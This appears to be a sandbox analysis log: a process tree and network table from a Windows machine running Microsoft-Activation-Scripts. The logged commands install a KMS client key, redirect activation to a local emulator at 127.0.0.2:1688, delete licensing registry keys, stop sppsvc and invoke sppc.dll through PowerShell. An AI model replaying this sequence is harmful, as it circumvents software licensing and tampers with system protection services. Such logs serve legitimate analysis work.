C:\Windows\System32\cmd.exe /S /D /c" echo "
C:\Windows\System32\find.exe
find /i "Ready"
C:\Windows\System32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "actionlist" /f
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$acl = (Get-Acl 'C:\Windows\System32\spp\store\2.0' | fl | Out-String); if (-not ($acl -match 'NT SERVICE\\sppsvc Allow FullControl') -or ($acl -match 'NT SERVICE\\sppsvc Deny')) {Exit 2}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$acl = (Get-Acl 'HKLM:\SYSTEM\WPA' | fl | Out-String); if (-not ($acl -match 'NT SERVICE\\sppsvc Allow QueryValues, EnumerateSubKeys, WriteKey') -or ($acl -match 'NT SERVICE\\sppsvc Deny')) {Exit 2}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$acl = (Get-Acl 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' | fl | Out-String); if (-not ($acl -match 'NT SERVICE\\sppsvc Allow SetValue') -or ($acl -match 'NT SERVICE\\sppsvc Deny')) {Exit 2}"
C:\Windows\System32\reg.exe
reg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion"
C:\Windows\System32\reg.exe
reg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Policies"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$netServ = (New-Object Security.Principal.SecurityIdentifier('S-1-5-20')).Translate([Security.Principal.NTAccount]).Value; $aclString = Get-Acl 'Registry::HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Policies' | Format-List | Out-String; if (-not ($aclString.Contains($netServ + ' Allow FullControl') -or $aclString.Contains('NT SERVICE\sppsvc Allow FullControl')) -or ($aclString.Contains('Deny'))) {Exit 3}"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey IS NOT NULL AND LicenseDependsOn is NULL and Description like '%KMSCLIENT%'" Get Name /value 2>nul
C:\Windows\System32\Wbem\WMIC.exe
wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey IS NOT NULL AND LicenseDependsOn is NULL and Description like '%KMSCLIENT%'" Get Name /value
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f') get ID /VALUE" 2>nul
C:\Windows\System32\Wbem\WMIC.exe
wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f') get ID /VALUE
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "040fa323-92b1-4baf-97a2-5b67feaefddb 0724cb7d-3437-4cb7-93cb-830375d0079d 0ad2ac98-7bb9-4201-8d92-312299201369 1a9a717a-cf13-4ba5-83c3-0fe25fa868d5 221a02da-e2a1-4b75-864c-0a4410a33fdf 291ece0e-9c38-40ca-a9e1-32cc7ec19507 2936d1d2-913a-4542-b54e-ce5a602a2a38 2c293c26-a45a-4a2a-a350-c69a67097529 2de67392-b7a7-462a-b1ca-108dd189f588 2ffd8952-423e-4903-b993-72a1aa44cf82 30a42c86-b7a0-4a34-8c90-ff177cb2acb7 345a5db0-d94f-4e3b-a0c0-7c42f7bc3ebf 3502365a-f88a-4ba4-822a-5769d3073b65 377333b1-8b5d-48d6-9679-1225c872d37c 3df374ef-d444-4494-a5a1-4b0d9fd0e203 3f1afc82-f8ac-4f6c-8005-1d233e606eee 49cd895b-53b2-4dc4-a5f7-b18aa019ad37 4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c 4f3da0d2-271d-4508-ae81-626b60809a38 5d78c4e9-aeb3-4b40-8ac2-6a6005e0ad6d 60b3ec1b-9545-4921-821f-311b129dd6f6 613d217f-7f13-4268-9907-1662339531cd 62f0c100-9c53-4e02-b886-a3528ddfe7f6 6365275e-368d-46ca-a0ef-fc0404119333 721f9237-9341-4453-a661-09e8baa6cca5 73111121-5638-40f6-bc11-f1d7b0d64300 7a802526-4c94-4bd1-ba14-835a1aca2120 7cb546c0-c7d5-44d8-9a5c-69ecdd782b69 82bbc092-bc50-4e16-8e18-b74fc486aec3 8ab9bdd1-1f67-4997-82d9-8878520837d9 8b351c9c-f398-4515-9900-09df49427262 90da7373-1c51-430b-bf26-c97e9c5cdc31 92fb8726-92a8-4ffc-94ce-f82e07444653 95dca82f-385d-4d39-b85b-5c73fa285d6f a48938aa-62fa-4966-9d44-9f04da3f72f2 b0773a15-df3a-4312-9ad2-83d69648e356 b4bfe195-541e-4e64-ad23-6177f19e395e b68e61d2-68ca-4757-be45-0cc2f3e68eee bd3762d7-270d-4760-8fb3-d829ca45278a c86d5194-4840-4dae-9c1c-0301003a5ab0 ca7df2e3-5ea0-47b8-9ac1-b1be4d8edd69 d552befb-48cc-4327-8f39-47d2d94f987c d6eadb3b-5ca8-4a6b-986e-35b550756111 df96023b-dcd9-4be2-afa0-c6c871159ebe e0c42288-980c-4788-a014-c080d2e1926e e4db50ea-bda1-4566-b047-0ca50abc6f07 e558417a-5123-4f6f-91e7-385c1c7ca9d4 e7a950a2-e548-4f10-bf16-02ec848e0643 eb6d346f-1c60-4643-b960-40ec31596c45 ec868e65-fadf-4759-b23e-93fe37f2cc29 ef51e000-2659-4f25-8345-3de70a9cf4c4 f7af7d09-40e4-419c-a49b-eae366689ebd fa755fe6-6739-40b9-8d84-6d0ea3b6d1ab fe74f55b-0338-41d6-b267-4a201abe7285" "
C:\Windows\System32\find.exe
find /i "2de67392-b7a7-462a-b1ca-108dd189f588"
C:\Windows\System32\Wbem\WMIC.exe
wmic path SoftwareLicensingService where __CLASS='SoftwareLicensingService' call InstallProductKey ProductKey="W269N-WFGWX-YVC9B-4J6C9-T83GX"
C:\Windows\System32\cmd.exe
cmd /c exit /b 0
C:\Windows\System32\Wbem\WMIC.exe
wmic path SoftwareLicensingService where __CLASS='SoftwareLicensingService' call RefreshLicenseStatus
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get ID /VALUE" 2>nul
C:\Windows\System32\Wbem\WMIC.exe
wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get ID /VALUE
C:\Windows\System32\reg.exe
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
C:\Windows\System32\reg.exe
reg delete "HKU\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f"
C:\Windows\System32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588" /f /v KeyManagementServiceName /t REG_SZ /d "127.0.0.2"
C:\Windows\System32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588" /f /v KeyManagementServicePort /t REG_SZ /d "1688"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Start-Job { Stop-Service sppsvc -force } | Wait-Job -Timeout 20 | Out-Null"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\sc.exe
sc query sppsvc
C:\Windows\System32\find.exe
find /i "STOPPED"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Start-Job { Restart-Service ClipSVC } | Wait-Job -Timeout 20 | Out-Null"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\Clipup.exe
"C:\Windows\system32\Clipup.exe" -o
C:\Windows\system32\Clipup.exe
"C:\Windows\system32\Clipup.exe" -o -ppl C:\Windows\SystemTemp\tem4A0E.tmp
C:\Windows\System32\ClipUp.exe
clipup -v -o
C:\Windows\System32\clipup.exe
clipup -v -o -ppl C:\Users\Admin\AppData\Local\Temp\tem4AE9.tmp
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /S /D /c" echo "Windows 11 Pro" "
C:\Windows\System32\find.exe
find /i "Windows"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get GracePeriodRemaining /VALUE" 2>nul
C:\Windows\System32\Wbem\WMIC.exe
wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get GracePeriodRemaining /VALUE
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powershell.exe "$([DateTime]::Now.addMinutes(6933338)).ToString('yyyy-MM-dd HH:mm:ss')" 2>nul
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$([DateTime]::Now.addMinutes(6933338)).ToString('yyyy-MM-dd HH:mm:ss')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':regdel\:.*';& ([ScriptBlock]::Create($f[1])) -protect"
C:\Windows\System32\reg.exe
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
C:\Windows\System32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f"
C:\Windows\System32\reg.exe
reg delete "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState" /v "State" /f
C:\Windows\System32\reg.exe
reg delete "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState" /v "SuppressRulesEngine" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Start-Job { Stop-Service sppsvc -force } | Wait-Job -Timeout 20 | Out-Null; $TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('SLpTriggerServiceWorker', 'sppc.dll', 22, 1, [Int32], @([UInt32], [IntPtr], [String], [UInt32]), 1, 3); [void]$TB.CreateType()::SLpTriggerServiceWorker(0, 0, 'reeval', 0)"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL desk.cpl,,0
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Desktop\Baif oc -efjie.pptx" /ou ""
C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" RenamePC
C:\Windows\System32\PickerHost.exe
C:\Windows\System32\PickerHost.exe -Embedding
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Desktop\Baif oc -efjie.pptx" /ou ""
C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 23.213.251.133:443 | cxcs.microsoft.net | tcp |
| GB | 92.123.128.144:443 | www.bing.com | tcp |
| GB | 95.101.143.34:443 | tcp | |
| GB | 92.123.128.164:443 | www.bing.com | tcp |
| GB | 92.123.128.164:443 | www.bing.com | tcp |
| GB | 92.123.128.164:443 | www.bing.com | tcp |
| GB | 92.123.128.164:443 | www.bing.com | tcp |
| GB | 92.123.128.164:443 | www.bing.com | tcp |
| GB | 92.123.128.164:443 | www.bing.com | tcp |
| US | 20.42.72.131:443 | browser.pipe.aria.microsoft.com | tcp |
| GB | 92.123.128.191:443 | www.bing.com | tcp |
| CH | 20.199.196.24:443 | 408c71c6b4182bc0e7b6dad6a1f85971.clo.footprintdns.com | tcp |
| US | 52.234.227.128:443 | ebe333a53a8b08e1a295fe7a35ef249e.azr.footprintdns.com | tcp |
| FR | 152.199.21.118:443 | static-ecst.licdn.com | tcp |
| US | 150.171.74.254:443 | bx-ring.msedge.net | tcp |
| US | 13.107.246.65:443 | fp-afd-nocache-ccp.azureedge.net | tcp |
| US | 172.202.65.254:443 | arc-ring.msedge.net | tcp |
| GB | 23.213.251.133:443 | cxcs.microsoft.net | tcp |
| GB | 92.123.128.149:443 | www.bing.com | tcp |
| US | 20.141.12.34:443 | fp-afd.azureedge.us | tcp |
| US | 20.141.12.34:443 | fp-afd.azureedge.us | tcp |
| US | 13.107.219.254:443 | t-ring-fallbacks1.msedge.net | tcp |
| CH | 20.203.193.248:443 | zrh20prdapp01-canary-opaph.netmon.azure.com | tcp |
| US | 13.107.246.65:443 | fp-afd-nocache-ccp.azureedge.net | tcp |
| FR | 52.98.163.34:443 | 894bc0c64677eddd0509476ce7bb433c.nrb.footprintdns.com | tcp |
| NL | 52.109.89.19:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.89.109.52.in-addr.arpa | udp |
| IE | 52.109.76.144:443 | odc.officeapps.live.com | tcp |
| GB | 2.18.63.31:443 | metadata.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.152:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 144.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.63.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.117.19.2.in-addr.arpa | udp |
| IE | 52.109.76.144:443 | odc.officeapps.live.com | tcp |
| IE | 52.109.76.144:443 | odc.officeapps.live.com | tcp |
| IE | 52.109.76.144:443 | odc.officeapps.live.com | tcp |
| IE | 52.109.76.144:443 | odc.officeapps.live.com | tcp |
| IE | 52.109.76.144:443 | odc.officeapps.live.com | tcp |
| GB | 95.101.143.34:443 | tcp | |
| US | 4.150.240.254:443 | arm-ring.msedge.net | tcp |
| US | 20.141.12.34:443 | fp-afd.azureedge.us | tcp |
| US | 52.108.9.254:443 | wac-ring.msedge.net | tcp |
| US | 8.8.8.8:53 | mcr-ring.msedge.net | udp |
| US | 150.171.69.254:443 | mcr-ring.msedge.net | tcp |
| US | 8.8.8.8:53 | 254.69.171.150.in-addr.arpa | udp |
| GB | 92.123.128.180:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 92.123.128.148:443 | www.bing.com | tcp |
| GB | 92.123.128.148:443 | www.bing.com | tcp |
| GB | 92.123.128.178:443 | www.bing.com | tcp |
| GB | 92.123.128.178:443 | www.bing.com | tcp |
| GB | 2.19.117.148:443 | aefd.nelreports.net | tcp |
| GB | 92.123.128.178:443 | www.bing.com | tcp |
| US | 13.107.21.200:443 | bing.com | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 104.21.10.247:443 | getgreenshot.org | tcp |
| US | 104.21.10.247:443 | getgreenshot.org | tcp |
| US | 8.8.8.8:53 | consent.cookiebot.com | udp |
| GB | 95.100.104.20:443 | consent.cookiebot.com | tcp |
| GB | 23.218.75.88:443 | consentcdn.cookiebot.com | tcp |
| GB | 23.218.75.88:443 | consentcdn.cookiebot.com | tcp |
| GB | 172.217.169.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 172.217.16.232:443 | ssl.google-analytics.com | tcp |
| GB | 172.217.16.232:443 | ssl.google-analytics.com | udp |
| US | 8.8.8.8:53 | 20.104.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.75.218.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.16.217.172.in-addr.arpa | udp |
| GB | 216.58.204.78:443 | fundingchoicesmessages.google.com | tcp |
| GB | 216.58.204.78:443 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.169.66:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | udp |
| US | 104.21.10.247:80 | getgreenshot.org | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| GB | 95.101.143.34:443 | tcp | |
| IE | 20.123.29.87:443 | 3ca286e5e5eb4aed42c415698015e279.azr.footprintdns.com | tcp |
| US | 150.171.69.254:443 | mcr-ring.msedge.net | tcp |
| US | 150.171.74.254:443 | bx-ring.msedge.net | tcp |
| IE | 20.123.29.87:443 | 3ca286e5e5eb4aed42c415698015e279.azr.footprintdns.com | tcp |
| US | 13.107.138.254:443 | spo-ring.msedge.net | tcp |
| US | 104.21.10.247:80 | getgreenshot.org | tcp |
| US | 104.21.10.247:80 | getgreenshot.org | tcp |
| US | 104.21.10.247:443 | getgreenshot.org | tcp |
| US | 192.0.77.2:443 | i1.wp.com | tcp |
| SE | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| SE | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| GB | 142.250.187.226:443 | googleads.g.doubleclick.net | udp |
| GB | 172.217.16.232:443 | ssl.google-analytics.com | udp |
| GB | 172.217.16.232:443 | ssl.google-analytics.com | tcp |
| GB | 216.58.204.78:443 | fundingchoicesmessages.google.com | udp |
| GB | 216.58.204.78:443 | fundingchoicesmessages.google.com | tcp |
| GB | 142.250.179.225:443 | tpc.googlesyndication.com | udp |
| GB | 216.58.204.67:443 | p4-gep5dc33nwvie-z3fpwuqpfem556nh-if-v6exp3-v4.metric.gstatic.com | tcp |
| GB | 142.250.179.225:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 216.58.204.67:443 | p4-gep5dc33nwvie-z3fpwuqpfem556nh-if-v6exp3-v4.metric.gstatic.com | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | tcp |
| JP | 172.217.26.227:443 | csi.gstatic.com | tcp |
| US | 152.199.19.161:443 | fp-vs.azureedge.net | tcp |
| US | 150.171.64.254:443 | ev2-ring.msedge.net | tcp |
| FR | 152.199.21.118:443 | static-ecst.licdn.com | tcp |
| GB | 23.213.251.133:443 | cxcs.microsoft.net | tcp |
| GB | 92.123.128.141:443 | www.bing.com | tcp |
| US | 150.171.84.254:443 | p-ring.msedge.net | tcp |
| US | 4.150.240.254:443 | arm-ring.msedge.net | tcp |
| US | 8.8.8.8:53 | ax-ring.msedge.net | udp |
| US | 150.171.28.254:443 | ax-ring.msedge.net | tcp |
| US | 8.8.8.8:53 | 141.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.84.171.150.in-addr.arpa | udp |
| US | 150.171.22.254:443 | ln-ring.msedge.net | tcp |
| US | 131.253.33.254:443 | a-ring-fallback.msedge.net | tcp |
| GB | 2.22.249.155:443 | ow1.res.office365.com | tcp |
| US | 8.8.8.8:53 | 155.249.22.2.in-addr.arpa | udp |
| GB | 23.213.251.133:443 | cxcs.microsoft.net | tcp |
| GB | 92.123.128.141:443 | www.bing.com | tcp |
| US | 131.253.33.254:443 | a-ring-fallback.msedge.net | tcp |
| US | 52.113.196.254:443 | teams-ring.msedge.net | tcp |
| US | 4.150.240.254:443 | arm-ring.msedge.net | tcp |
| US | 150.171.69.254:443 | mcr-ring.msedge.net | tcp |
| US | 13.107.138.254:443 | spo-ring.msedge.net | tcp |
| US | 13.107.246.254:443 | tring.clo.footprintdns.com | tcp |
| US | 8.8.8.8:53 | 254.246.107.13.in-addr.arpa | udp |
| US | 152.199.19.161:443 | fp-vs-nocache.azureedge.net | tcp |
| US | 150.171.74.254:443 | bx-ring.msedge.net | tcp |
| US | 152.199.19.161:443 | fp-vs-nocache.azureedge.net | tcp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
| US | 52.123.129.254:443 | dual-s-ring.msedge.net | tcp |
| US | 172.202.65.254:443 | arc-ring.msedge.net | tcp |
| GB | 92.123.128.156:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 92.123.128.187:443 | r.bing.com | tcp |
| GB | 92.123.128.187:443 | r.bing.com | tcp |
| GB | 92.123.128.157:443 | www.bing.com | tcp |
| GB | 92.123.128.157:443 | www.bing.com | tcp |
| GB | 3.10.14.187:443 | theunitysoft.com | tcp |
| GB | 3.10.14.187:443 | theunitysoft.com | tcp |
| GB | 3.10.14.187:443 | theunitysoft.com | tcp |
| GB | 3.10.14.187:443 | theunitysoft.com | tcp |
| GB | 3.10.14.187:443 | theunitysoft.com | tcp |
| GB | 3.10.14.187:443 | theunitysoft.com | tcp |
| FR | 3.165.113.122:443 | widget.trustpilot.com | tcp |
| FR | 99.86.91.29:443 | js.stripe.com | tcp |
| US | 8.8.8.8:53 | invitejs.trustpilot.com | udp |
| US | 104.21.7.63:443 | sw-themes.com | tcp |
| US | 104.21.7.63:443 | sw-themes.com | tcp |
| FR | 52.222.149.7:443 | invitejs.trustpilot.com | tcp |
| FR | 52.222.169.15:443 | widgets.trustedshops.com | tcp |
| US | 8.8.8.8:53 | 29.91.86.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.7.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.149.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.169.222.52.in-addr.arpa | udp |
| IE | 34.241.59.225:443 | api.stripe.com | tcp |
| US | 150.171.28.10:443 | bat.bing.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| FR | 18.245.175.102:443 | static.hotjar.com | tcp |
| GB | 142.250.187.226:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.187.226:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.212.227:443 | www.google.co.uk | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| BE | 142.250.110.156:443 | stats.g.doubleclick.net | tcp |
| BE | 142.250.110.156:443 | stats.g.doubleclick.net | tcp |
| GB | 216.58.212.227:443 | www.google.co.uk | tcp |
| GB | 216.58.212.227:443 | www.google.co.uk | tcp |
| FR | 18.164.52.40:443 | script.hotjar.com | tcp |
| FR | 99.86.91.29:443 | js.stripe.com | tcp |
| US | 3.165.148.44:443 | cdn1.api.trustedshops.com | tcp |
| US | 54.186.23.98:443 | r.stripe.com | tcp |
| US | 54.186.23.98:443 | r.stripe.com | tcp |
| US | 54.186.23.98:443 | r.stripe.com | tcp |
| US | 54.186.23.98:443 | r.stripe.com | tcp |
| IE | 54.76.53.164:443 | merchant-ui-api.stripe.com | tcp |
| US | 54.186.23.98:443 | r.stripe.com | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 52.167.30.171:443 | fpt2.microsoft.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 140.82.112.21:443 | collector.github.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 140.82.112.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| N/A | 127.0.0.2:1688 | tcp | |
| US | 172.67.164.214:80 | getgreenshot.org | tcp |
| US | 172.67.164.214:443 | getgreenshot.org | tcp |
| N/A | 127.0.0.2:1688 | tcp | |
| GB | 23.213.251.133:443 | cxcs.microsoft.net | tcp |
| GB | 92.123.128.141:443 | www.bing.com | tcp |
| GB | 23.213.251.133:443 | cxcs.microsoft.net | tcp |
| GB | 92.123.128.137:443 | www.bing.com | tcp |
| IE | 52.109.76.144:443 | odc.officeapps.live.com | tcp |
| IE | 52.109.76.144:443 | odc.officeapps.live.com | tcp |
| GB | 95.101.143.34:443 | tcp | |
| US | 13.107.246.254:443 | t-ring-s.msedge.net | tcp |
| US | 13.107.138.254:443 | spo-ring.msedge.net | tcp |
| GB | 23.213.251.133:443 | cxcs.microsoft.net | tcp |
| GB | 92.123.128.161:443 | www.bing.com | tcp |
| N/A | 127.0.0.2:1688 | tcp | |
| N/A | 127.0.0.2:1688 | tcp | |
| N/A | 127.0.0.2:1688 | tcp | |
